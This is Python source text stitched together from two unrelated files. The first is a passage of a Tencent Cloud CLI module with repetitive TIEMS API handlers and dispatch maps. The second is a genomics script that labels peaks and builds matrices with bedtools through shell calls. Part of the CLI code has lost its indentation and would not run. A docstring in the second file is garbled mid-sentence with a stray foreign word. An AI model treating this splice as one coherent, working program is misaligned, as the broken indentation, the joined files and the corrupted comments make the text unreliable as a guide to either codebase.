search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj)))
else:
print('Inquiry result is %s.' % search(g_param['OptionsDefine.WaiterInfo']['expr'], json_obj))
time.sleep(g_param['OptionsDefine.WaiterInfo']['interval'])
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteResourceGroup(args, parsed_globals):
    """Invoke tiems DeleteResourceGroup with the parsed CLI arguments,
    honoring the global waiter options (poll until the waited expression
    reaches the target value, or time out)."""
    g_param = parse_global_arg(parsed_globals)

    # Credential source: CVM role, assumed STS role, or static keys.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.Token]
        )

    timeout_arg = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=60 if timeout_arg is None else int(timeout_arg),
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = mod.TiemsClient(cred, g_param[OptionsDefine.Region], profile)
    client._sdkVersion += ("_CLI_" + __version__)
    models = MODELS_MAP[g_param[OptionsDefine.Version]]
    model = models.DeleteResourceGroupRequest()
    model.from_json_string(json.dumps(args))

    start_time = time.time()
    while True:
        rsp = client.DeleteResourceGroup(model)
        result = rsp.to_json_string()
        try:
            json_obj = json.loads(result)
        except TypeError:
            json_obj = json.loads(result.decode('utf-8'))  # python3.3
        if not g_param[OptionsDefine.Waiter]:
            break
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
                              (waiter['expr'], waiter['to'],
                               search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteRuntime(args, parsed_globals):
    """Invoke the TIEMS DeleteRuntime API and print the formatted response.

    When a waiter is configured, keeps re-issuing the request until the
    waiter expression matches the target value or the waiter times out.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential priority: CVM role > assumed STS role > plain secret pair.
    # Lookup order is kept lazy: role keys are only read when CVM role is off.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.Token]
        )
    req_timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(req_timeout) if req_timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    api_module = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = api_module.TiemsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[g_param[OptionsDefine.Version]].DeleteRuntimeRequest()
    request.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DeleteRuntime(request)
        raw = rsp.to_json_string()
        try:
            json_obj = json.loads(raw)
        except TypeError:
            # python3.3: to_json_string may return bytes.
            json_obj = json.loads(raw.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
                              (waiter['expr'], waiter['to'],
                               search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doExposeService(args, parsed_globals):
    """Invoke the TIEMS ExposeService API and print the formatted response.

    When a waiter is configured, keeps re-issuing the request until the
    waiter expression matches the target value or the waiter times out.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential priority: CVM role > assumed STS role > plain secret pair.
    # Lookup order is kept lazy: role keys are only read when CVM role is off.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.Token]
        )
    req_timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(req_timeout) if req_timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    api_module = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = api_module.TiemsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[g_param[OptionsDefine.Version]].ExposeServiceRequest()
    request.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.ExposeService(request)
        raw = rsp.to_json_string()
        try:
            json_obj = json.loads(raw)
        except TypeError:
            # python3.3: to_json_string may return bytes.
            json_obj = json.loads(raw.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
                              (waiter['expr'], waiter['to'],
                               search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDeleteJob(args, parsed_globals):
    """Invoke the TIEMS DeleteJob API and print the formatted response.

    When a waiter is configured, keeps re-issuing the request until the
    waiter expression matches the target value or the waiter times out.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential priority: CVM role > assumed STS role > plain secret pair.
    # Lookup order is kept lazy: role keys are only read when CVM role is off.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.Token]
        )
    req_timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(req_timeout) if req_timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    api_module = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = api_module.TiemsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[g_param[OptionsDefine.Version]].DeleteJobRequest()
    request.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DeleteJob(request)
        raw = rsp.to_json_string()
        try:
            json_obj = json.loads(raw)
        except TypeError:
            # python3.3: to_json_string may return bytes.
            json_obj = json.loads(raw.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
                              (waiter['expr'], waiter['to'],
                               search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doEnableRsgAsGroup(args, parsed_globals):
    """Invoke the TIEMS EnableRsgAsGroup API and print the formatted response.

    When a waiter is configured, keeps re-issuing the request until the
    waiter expression matches the target value or the waiter times out.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential priority: CVM role > assumed STS role > plain secret pair.
    # Lookup order is kept lazy: role keys are only read when CVM role is off.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.Token]
        )
    req_timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(req_timeout) if req_timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    api_module = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = api_module.TiemsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[g_param[OptionsDefine.Version]].EnableRsgAsGroupRequest()
    request.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.EnableRsgAsGroup(request)
        raw = rsp.to_json_string()
        try:
            json_obj = json.loads(raw)
        except TypeError:
            # python3.3: to_json_string may return bytes.
            json_obj = json.loads(raw.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
                              (waiter['expr'], waiter['to'],
                               search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeServiceConfigs(args, parsed_globals):
    """Invoke the TIEMS DescribeServiceConfigs API and print the formatted response.

    When a waiter is configured, keeps re-issuing the request until the
    waiter expression matches the target value or the waiter times out.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential priority: CVM role > assumed STS role > plain secret pair.
    # Lookup order is kept lazy: role keys are only read when CVM role is off.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.Token]
        )
    req_timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(req_timeout) if req_timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    api_module = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = api_module.TiemsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[g_param[OptionsDefine.Version]].DescribeServiceConfigsRequest()
    request.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeServiceConfigs(request)
        raw = rsp.to_json_string()
        try:
            json_obj = json.loads(raw)
        except TypeError:
            # python3.3: to_json_string may return bytes.
            json_obj = json.loads(raw.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
                              (waiter['expr'], waiter['to'],
                               search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeRsgAsGroups(args, parsed_globals):
    """Invoke the TIEMS DescribeRsgAsGroups API and print the formatted response.

    When a waiter is configured, keeps re-issuing the request until the
    waiter expression matches the target value or the waiter times out.
    """
    g_param = parse_global_arg(parsed_globals)
    # Credential priority: CVM role > assumed STS role > plain secret pair.
    # Lookup order is kept lazy: role keys are only read when CVM role is off.
    if g_param[OptionsDefine.UseCVMRole.replace('-', '_')]:
        cred = credential.CVMRoleCredential()
    elif g_param[OptionsDefine.RoleArn.replace('-', '_')] and g_param[OptionsDefine.RoleSessionName.replace('-', '_')]:
        cred = credential.STSAssumeRoleCredential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.RoleArn.replace('-', '_')],
            g_param[OptionsDefine.RoleSessionName.replace('-', '_')]
        )
    else:
        cred = credential.Credential(
            g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey],
            g_param[OptionsDefine.Token]
        )
    req_timeout = g_param[OptionsDefine.Timeout]
    http_profile = HttpProfile(
        reqTimeout=int(req_timeout) if req_timeout is not None else 60,
        reqMethod="POST",
        endpoint=g_param[OptionsDefine.Endpoint],
        proxy=g_param[OptionsDefine.HttpsProxy.replace('-', '_')]
    )
    client_profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
    api_module = CLIENT_MAP[g_param[OptionsDefine.Version]]
    client = api_module.TiemsClient(cred, g_param[OptionsDefine.Region], client_profile)
    client._sdkVersion += ("_CLI_" + __version__)
    request = MODELS_MAP[g_param[OptionsDefine.Version]].DescribeRsgAsGroupsRequest()
    request.from_json_string(json.dumps(args))
    start_time = time.time()
    while True:
        rsp = client.DescribeRsgAsGroups(request)
        raw = rsp.to_json_string()
        try:
            json_obj = json.loads(raw)
        except TypeError:
            # python3.3: to_json_string may return bytes.
            json_obj = json.loads(raw.decode('utf-8'))
        if not g_param[OptionsDefine.Waiter]:
            break
        waiter = g_param['OptionsDefine.WaiterInfo']
        if search(waiter['expr'], json_obj) == waiter['to']:
            break
        if time.time() - start_time >= waiter['timeout']:
            raise ClientError('Request timeout, wait `%s` to `%s` timeout, last request is %s' %
                              (waiter['expr'], waiter['to'],
                               search(waiter['expr'], json_obj)))
        print('Inquiry result is %s.' % search(waiter['expr'], json_obj))
        time.sleep(waiter['interval'])
    FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
# Supported API version -> generated client module.
CLIENT_MAP = {
    "v20190416": tiems_client_v20190416,
}
# Supported API version -> generated request/response model module.
MODELS_MAP = {
    "v20190416": models_v20190416,
}
# CLI action name -> handler function (handlers are defined earlier in this file).
ACTION_MAP = {
    "CreateService": doCreateService,
    "CreateServiceConfig": doCreateServiceConfig,
    "CreateRsgAsGroup": doCreateRsgAsGroup,
    "DeleteInstance": doDeleteInstance,
    "DeleteService": doDeleteService,
    "DeleteRsgAsGroup": doDeleteRsgAsGroup,
    "UpdateRsgAsGroup": doUpdateRsgAsGroup,
    "DeleteServiceConfig": doDeleteServiceConfig,
    "DisableRsgAsGroup": doDisableRsgAsGroup,
    "UpdateService": doUpdateService,
    "CreateRuntime": doCreateRuntime,
    "DescribeServices": doDescribeServices,
    "DescribeInstances": doDescribeInstances,
    "DescribeResourceGroups": doDescribeResourceGroups,
    "DescribeRuntimes": doDescribeRuntimes,
    "DescribeRsgAsGroupActivities": doDescribeRsgAsGroupActivities,
    "UpdateJob": doUpdateJob,
    "CreateJob": doCreateJob,
    "DeleteResourceGroup": doDeleteResourceGroup,
    "DeleteRuntime": doDeleteRuntime,
    "ExposeService": doExposeService,
    "DeleteJob": doDeleteJob,
    "EnableRsgAsGroup": doEnableRsgAsGroup,
    "DescribeServiceConfigs": doDescribeServiceConfigs,
    "DescribeRsgAsGroups": doDescribeRsgAsGroups,
}
# API versions this command group can be pinned to via --version.
AVAILABLE_VERSION_LIST = [
    "v20190416",
]
def action_caller():
    """Return the action-name -> handler dispatch table for this service."""
    return ACTION_MAP
def parse_global_arg(parsed_globals):
g_param = parsed_globals
is_exist_profile = True
if not parsed_globals["profile"]:
is_exist_profile = False
g_param["profile"] = "default"
configure_path = os.path.join(os.path.expanduser("~"), ".tccli")
is_conf_exist, conf_path = Utils.file_existed(configure_path, g_param["profile"] + ".configure")
is_cred_exist, cred_path = Utils.file_existed(configure_path, g_param["profile"] + ".credential")
conf = {}
cred = {}
if is_conf_exist:
conf = Utils.load_json_msg(conf_path)
if is_cred_exist:
cred = Utils.load_json_msg(cred_path)
if not (isinstance(conf, dict) and isinstance(cred, dict)):
raise ConfigurationError(
"file: %s or %s is not json format"
% (g_param["profile"] + ".configure", g_param["profile"] + | |
<filename>bin/pre_scripts/snapshot_v.0.2.py<gh_stars>1-10
import os
import numpy as np
from subprocess import call
from collections import Counter
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
################################################################################################
### read 2d array
def read2d_array(filename, dtype_used):
    """Read a tab-separated text file into a 2D numpy array.

    Parameters
    ----------
    filename : str
        Path to a TSV file; every row should have the same number of fields
        (numpy will otherwise build an object/ragged array).
    dtype_used : type or str
        dtype passed straight to ``np.array`` (e.g. ``'str'``, ``int``).

    Returns
    -------
    numpy.ndarray with one row per input line.
    """
    # Context manager closes the handle even if parsing raises, unlike the
    # previous manual open/close pair.
    with open(filename, 'r') as data:
        rows = [[field.strip() for field in line.split('\t')] for line in data]
    return np.array(rows, dtype=dtype_used)
################################################################################################
### write 2d matrix
def write2d_array(array, output):
    """Write a 2D iterable to *output* as tab-separated rows, one line per row.

    Values are converted with ``str``. Unlike the original implementation,
    which indexed ``records[len(records)-1]`` and crashed on an empty row,
    ``'\\t'.join`` handles zero-length rows gracefully.
    """
    with open(output, 'w') as out:
        for records in array:
            out.write('\t'.join(str(value) for value in records) + '\n')
################################################################################################
### get convert bedtools window output to matrix of pk and intersect function label info
def function_label_info(input_bedtools_window, id_col, lb_col, pk_col, function_col):
    """Parse `bedtools window` output into per-overlap records.

    Each *_col argument is a 1-based column number; ``pk_col`` and
    ``function_col`` point at a start coordinate, with the matching end
    coordinate in the following column.

    Returns a list of rows:
        [peak_id, state_label, overlap_len, midpoint_dist, state_len]
    """
    records = []
    with open(input_bedtools_window, 'r') as handle:
        for line in handle:
            fields = [x.strip() for x in line.split('\t')]
            pk_start, pk_end = int(fields[pk_col - 1]), int(fields[pk_col])
            f_start, f_end = int(fields[function_col - 1]), int(fields[function_col])
            # Intersection length of the two intervals. This is exactly what
            # the original four-way case analysis on relative endpoint
            # positions computed in each branch.
            overlap = min(f_end, pk_end) - max(f_start, pk_start)
            # Signed distance between interval midpoints (state minus peak).
            mid_dist = (float(f_end) + float(f_start) - float(pk_end) - float(pk_start)) / 2
            # Full length of the function-state interval.
            state_len = f_end - f_start
            records.append([fields[id_col - 1], fields[lb_col - 1], overlap, mid_dist, state_len])
    return records
################################################################################################
### get peak's function labels
def get_cRE_function_state(data_info_matrix, id_col, lb_col, cover_col, middist_col, functionlen, bed_od_file, bed_od_idcol, outputname):
    """Pick one function-state label per peak and write them to *outputname*.

    For each peak id, ties between competing state labels are broken in this
    order: prefer non-'0' over '0', then larger覆盖 -- larger overlap length,
    then smaller midpoint distance, then smaller state length. Column
    arguments are 1-based indices into the rows of data_info_matrix
    (as produced by function_label_info). Output has one label per line of
    bed_od_file, 'NA' for peaks with no intersecting state.
    """
    ### read DNA region function state info matrix
    pk_id_list = []
    data_function1={}
    data_function1_maxcover={} ### coverage size
    data_function1_middist={} ### midpoint dist
    data_function1_statelen={} ### function state len
    ### initialize problem counter (counts unresolved ties, see the final else)
    k=0
    for info in data_info_matrix:
        pk_id = info[id_col-1]
        lb_tmp = info[lb_col-1]
        ### creat pk_id_list for keeping the id order in output
        pk_id_list.append(pk_id)
        if not (pk_id in data_function1):
            # First label seen for this peak wins provisionally.
            data_function1[pk_id] = lb_tmp
            data_function1_maxcover[pk_id] = info[cover_col-1]
            data_function1_middist[pk_id] = info[middist_col-1]
            data_function1_statelen[pk_id] = info[functionlen-1]
        elif (lb_tmp!='0') and (data_function1[pk_id]=='0'):
            ### if interesect non-0-state, use non-0-state replace 0 state
            data_function1[pk_id] = lb_tmp
            data_function1_maxcover[pk_id] = info[cover_col-1]
            data_function1_middist[pk_id] = info[middist_col-1]
            data_function1_statelen[pk_id] = info[functionlen-1]
        elif info[cover_col-1] > data_function1_maxcover[pk_id] and lb_tmp!='0':
            ### if multiple cover; select the highest covering state
            data_function1[pk_id] = lb_tmp
            data_function1_maxcover[pk_id] = info[cover_col-1]
            data_function1_middist[pk_id] = info[middist_col-1]
            data_function1_statelen[pk_id] = info[functionlen-1]
        elif info[cover_col-1] == data_function1_maxcover[pk_id]: ### if 2 states cover the same region with same length
            # NOTE(review): midpoint distance is compared signed, not by
            # absolute value -- confirm that is intended.
            if info[middist_col-1] < data_function1_middist[pk_id] and lb_tmp!='0':
                ### if cover the same; check mid point distance
                data_function1[pk_id] = lb_tmp
                data_function1_maxcover[pk_id] = info[cover_col-1]
                data_function1_middist[pk_id] = info[middist_col-1]
                data_function1_statelen[pk_id] = info[functionlen-1]
            elif info[middist_col-1] == data_function1_middist[pk_id]: ### if 2 states cover the same region with same length; with same midpoint dist
                if info[functionlen-1] < data_function1_statelen[pk_id] and lb_tmp!='0':
                    ### if cover same & mid point distance same; check state len
                    data_function1[pk_id] = lb_tmp
                    data_function1_maxcover[pk_id] = info[cover_col-1]
                    data_function1_middist[pk_id] = info[middist_col-1]
                    data_function1_statelen[pk_id] = info[functionlen-1]
                else: ### if 2 states cover the same region with same length; with same midpoint dist; with same state length ...give attention!
                    k=k+1
                    print('problem!')
                    print(k)
    ### read original bed file to get the pk id list
    # NOTE: the parameter name is rebound from path string to file object here.
    bed_od_file=open(bed_od_file,'r')
    bed_od_id_list = []
    for records in bed_od_file:
        bed_od_id_list.append(records.split()[bed_od_idcol-1])
    bed_od_file.close()
    ### write function label output
    result=open(outputname,'w')
    for pkid in bed_od_id_list:
        if pkid in data_function1:
            tmp=data_function1[pkid]
            result.write(tmp+'\n')
        else:
            # NOTE(review): `tmp=records` looks like leftover dead code --
            # `tmp` is unused here and 'NA' is written regardless.
            tmp=records
            result.write('NA'+'\n')
    result.close()
################################################################################################
### get index/signal matrix
def get_mark_matrix(peak_bed, peak_info_column, mark_list, output_file, method, sort_sigbed, script_folder, signal_col=None):
    """Build a peak-by-mark matrix by running bedtools against each mark file.

    peak_bed: peaks file; assumes peak_bed + '.sort.bed' already exists (this
        function copies it but does not itself sort it -- TODO confirm upstream
        sorting). mark_list: TSV of (mark bed path, cell type) rows.
    method: 'intersect' (binary counts), 'map' (mean of signal_col), or
        'window' (function-state labels via function_label_info /
        get_cRE_function_state). sort_sigbed: 'T' to sort each mark file first.
    Result columns are pasted onto output_file via shell commands; no return.
    """
    ### sort input bed files
    sort_bed_file = peak_bed + '.sort.bed'
    call('cp ' + sort_bed_file + ' ' + output_file, shell=True)
    ##############################
    ### generate index mark matrix
    mark_list_vec = open(mark_list, 'r')
    celltype_list = []
    for mark_bed in mark_list_vec:
        tmp = [x.strip() for x in mark_bed.split('\t')]
        ### read bianry label file list
        mark_bed_file = tmp[0]
        print(mark_bed_file)
        ### add cell type name to cell type list
        celltype_list.append(tmp[1])
        #######
        ### sort bianry label bed files
        if sort_sigbed == 'T':
            call('sort -k1,1 -k2,2n ' + mark_bed_file + ' > ' + mark_bed_file+'.sort.bed', shell=True)
        else:
            call('cp ' + mark_bed_file + ' ' + mark_bed_file+'.sort.bed', shell=True)
        #######
        ### use bedtools to generate the index/signal matrix
        if method == 'intersect':
            ### used bedtools intersect to get the binary label of each peak
            call(script_folder + 'bedtools2/bin/' + 'bedtools intersect -c -a ' + sort_bed_file + ' -b ' + mark_bed_file+'.sort.bed' + ' > ' + mark_bed_file+'.tmp01.txt', shell=True)
        elif method == 'map':
            ### used bedtools map to get the average signal of each peak
            call(script_folder + 'bedtools2/bin/' + 'bedtools map -c ' + str(signal_col) + ' -null 0 -o mean -a ' + sort_bed_file + ' -b ' + mark_bed_file+'.sort.bed' + ' > ' + mark_bed_file+'.tmp01.txt', shell=True)
        elif method == 'window':
            ### used bedtools window to pair peaks with overlapping state intervals
            call(script_folder + 'bedtools2/bin/' + 'bedtools window -a ' + sort_bed_file + ' -b ' + mark_bed_file+'.sort.bed' + ' -w 0 > ' + mark_bed_file+'.tmp01.txt', shell=True)
            ### convert bedtools window output to matrix of pk and intersect function label info (intersect region; midpoint dist; TF peak length)
            data_info_matrix = function_label_info(mark_bed_file+'.tmp01.txt', 4, 9, 2, 6)
            ### get peak's function labels based on intersect region; midpoint dist; TF peak length
            ### (overwrites the tmp01 file with one label per peak)
            get_cRE_function_state(data_info_matrix, 1, 2, 3, 4, 5, sort_bed_file, 4, mark_bed_file+'.tmp01.txt')
        ### cut the map number column
        call('cut -f'+ str(peak_info_column) +" -d$'\t' " + mark_bed_file+'.tmp01.txt' + ' > ' + mark_bed_file+'.tmp02.txt', shell=True)
        ### cbind to matrix
        call('paste ' + output_file + ' ' + mark_bed_file+'.tmp02.txt' + ' > ' + output_file+'.tmp.txt' + ' && mv ' + output_file+'.tmp.txt ' + output_file, shell=True)
        ### remove tmp files
        call('rm ' + mark_bed_file+'.tmp01.txt' + ' ' + mark_bed_file+'.tmp02.txt' + ' ' + mark_bed_file+'.sort.bed', shell=True)
    mark_list_vec.close()
################################################################################################
### get merged peaks
def merge_pk(peak_list, merge_pk_filename, script_folder):
    """Concatenate, sort, and `bedtools merge` all peak files in *peak_list*.

    peak_list: TSV whose first column is a peak bed path. Writes the merged
    peaks (with a chrom_start_end id as 4th column) to
    merge_pk_filename + '.sort.bed' in the current working directory and
    returns that filename. Uses temp files all_pk.bed / all_pk.sort.bed.
    """
    import os.path
    import os
    cwd = os.getcwd()
    print(cwd)
    # Start from a clean slate: the cat below appends.
    if os.path.isfile('all_pk.bed'):
        call('rm all_pk.bed', shell=True)
    ### read filenames in peak list
    for file_info in open(peak_list, 'r'):
        filename = file_info.split('\t')[0]
        call('cat ' + filename + ' >> all_pk.bed', shell=True)
    ### sort merge_pk
    call('sort -k1,1 -k2,2n all_pk.bed > all_pk.sort.bed', shell=True)
    ### merge peak
    outputfile_name = merge_pk_filename + '.sort.bed'
    call(script_folder + 'bedtools2/bin/' + 'bedtools merge -i all_pk.sort.bed > ' + outputfile_name, shell=True)
    ### add pk id (chrom_start_end) as a 4th column
    call('cat ' + outputfile_name + ' | awk -F \'\t\' -v OFS=\'\t\' \'{print $1, $2, $3, $1"_"$2"_"$3}\' > ' + outputfile_name + '.tmp.txt', shell=True)
    call('mv ' + outputfile_name + '.tmp.txt ' + outputfile_name, shell=True)
    ### rm tmp files
    call('rm all_pk.bed all_pk.sort.bed', shell=True)
    ### return filename
    return(outputfile_name)
################################################################################################
### vector most frequent element
def frequent(element_vector):
    """Return the most common element of *element_vector*.

    Ties are broken by first occurrence, per Counter.most_common.
    """
    (winner, _count), = Counter(element_vector).most_common(1)
    return winner
################################################################################################
### column based calculation
def matrix_col_cal(matrix, function, para=None):
    """Apply *function* to every column of *matrix* and stack the results.

